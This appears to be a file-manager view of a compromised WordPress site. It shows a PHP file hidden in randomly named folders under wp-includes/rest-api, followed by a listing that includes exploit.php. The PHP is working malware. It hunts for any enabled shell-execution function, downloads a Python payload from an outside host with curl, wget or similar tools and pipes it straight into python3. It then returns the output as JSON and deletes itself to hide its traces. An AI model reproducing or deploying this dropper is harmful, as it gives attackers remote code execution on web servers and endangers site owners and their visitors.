PATH:
home
/
niazsaze
/
public_html
/
wp-includes
/
rest-api
/
ayzgtcw
/
vtdyixg
/
whnxoyf
<?php ini_set('display_errors', '0'); ini_set('display_startup_errors', '0'); error_reporting(0); header('Content-Type: application/json'); $payload_url = 'https://i30.bz/.F/copy.txt'; $indice = "racoon"; function pick_executor() { $candidates = ['exec', 'shell_exec', 'passthru', 'system', 'popen', 'proc_open']; $disabled = array_map('trim', explode(',', (string) ini_get('disable_functions'))); $disabled = array_map('strtolower', $disabled); foreach ($candidates as $fn) { if (function_exists($fn) && !in_array(strtolower($fn), $disabled, true)) { return $fn; } } return null; } function run_cmd($executor, $cmd) { $cmd_full = $cmd . ' 2>&1'; switch ($executor) { case 'exec': exec($cmd_full, $out, $code); return ['output' => implode("\n", $out), 'code' => $code]; case 'shell_exec': $out = shell_exec($cmd_full); return ['output' => (string) $out, 'code' => 0]; case 'system': ob_start(); system($cmd_full, $code); $out = ob_get_clean(); return ['output' => (string) $out, 'code' => $code]; case 'passthru': ob_start(); passthru($cmd_full, $code); $out = ob_get_clean(); return ['output' => (string) $out, 'code' => $code]; case 'popen': $h = popen($cmd_full, 'r'); if (!$h) return ['output' => '', 'code' => 1]; $out = ''; while (!feof($h)) $out .= fread($h, 4096); $code = pclose($h); return ['output' => $out, 'code' => $code]; case 'proc_open': $desc = [1 => ['pipe', 'w'], 2 => ['pipe', 'w']]; $p = proc_open($cmd, $desc, $pipes); if (!is_resource($p)) return ['output' => '', 'code' => 1]; $out = stream_get_contents($pipes[1]) . stream_get_contents($pipes[2]); fclose($pipes[1]); fclose($pipes[2]); $code = proc_close($p); return ['output' => $out, 'code' => $code]; } return ['output' => '', 'code' => 1]; } $executor = pick_executor(); if ($executor === null) { echo json_encode(['indice' => $indice,'success' => false, 'error' => 'php Disabled Exec']); unlink(__FILE__); exit; } $which = run_cmd($executor, 'command -v python3 || which python3'); if (trim($which['output']) === '') { echo json_encode(['indice' => $indice,'success' => false, 'error' => 'no python3']); unlink(__FILE__); exit; } function has_bin($executor, $bin) { $r = run_cmd($executor, 'command -v ' . escapeshellarg($bin) . ' || which ' . escapeshellarg($bin)); return trim($r['output']) !== ''; } $url_arg = escapeshellarg($payload_url); $fetcher = null; $cmd = null; if (has_bin($executor, 'curl')) { $fetcher = 'curl'; $cmd = "curl -fsSL $url_arg | python3"; } elseif (has_bin($executor, 'wget')) { $fetcher = 'wget'; $cmd = "wget -qO- $url_arg | python3"; } elseif (has_bin($executor, 'fetch')) { $fetcher = 'fetch'; $cmd = "fetch -qo- $url_arg | python3"; } elseif (has_bin($executor, 'lynx')) { $fetcher = 'lynx'; $cmd = "lynx -source $url_arg | python3"; } else { $fetcher = 'python3-urllib'; $py = 'import urllib.request,sys; sys.stdout.write(urllib.request.urlopen(' . var_export($payload_url, true) . ').read().decode())'; $cmd = 'python3 -c ' . escapeshellarg($py) . ' | python3'; if (function_exists('ini_get') && ini_get('allow_url_fopen')) { $code = @file_get_contents($payload_url); if ($code !== false && $code !== '') { $fetcher = 'php-file_get_contents'; $tmp = tempnam(sys_get_temp_dir(), 'py_'); file_put_contents($tmp, $code); $cmd = 'python3 ' . escapeshellarg($tmp) . '; rm -f ' . escapeshellarg($tmp); } } } $result = run_cmd($executor, $cmd); $output = trim($result['output']); if ($output === '') { echo json_encode(['indice' => $indice,'success' => false, 'error' => 'fail execution']); unlink(__FILE__); exit; } echo json_encode(['indice' => $indice,'success' => true, 'executor' => $executor, 'fetcher' => $fetcher, 'result' => $output]); unlink(__FILE__);
[-] index.php
[edit]
[-] php.ini
[edit]
[-] exploit.php
[edit]
[-] cabjghis.php
[edit]
[+]
..